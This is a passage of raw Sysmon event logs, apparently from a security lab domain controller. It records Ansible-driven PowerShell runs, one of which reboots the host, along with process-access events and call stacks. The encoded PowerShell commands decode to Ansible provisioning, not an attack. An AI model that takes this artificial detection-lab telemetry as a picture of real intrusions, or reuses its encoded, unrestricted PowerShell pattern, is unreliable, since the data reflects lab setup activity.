@"C:\Users\ADMINI~1\AppData\Local\Temp\edneznio.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425F-6000-BA54-110000000000}0x1154ba0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.137{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\edneznio.cmdline2021-01-14 13:08:48.137 11241100x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:08:48.137{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\edneznio.dll2021-01-14 13:08:48.137 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-4261-6000-E202-000000009901}27884380C:\Windows\system32\conhost.exe{08A6967A-4261-6000-E802-000000009901}4908C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E802-000000009901}4908C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.887{08A6967A-4261-6000-E702-000000009901}50562300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4261-6000-E802-000000009901}4908C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5fe2b99b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2cc5a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2cc276|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5fd7db5b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f28ce0c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2eb2db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2ce940|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2ce940|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2ce7d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2c0756|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2ccc89|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2cc87c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2cc5a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2cc276|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5fd7db5b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2b30d7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+5f2b26a7 154100x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.895{08A6967A-4261-6000-E802-000000009901}4908C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4260-6000-168F-110000000000}0x118f160HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.824{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 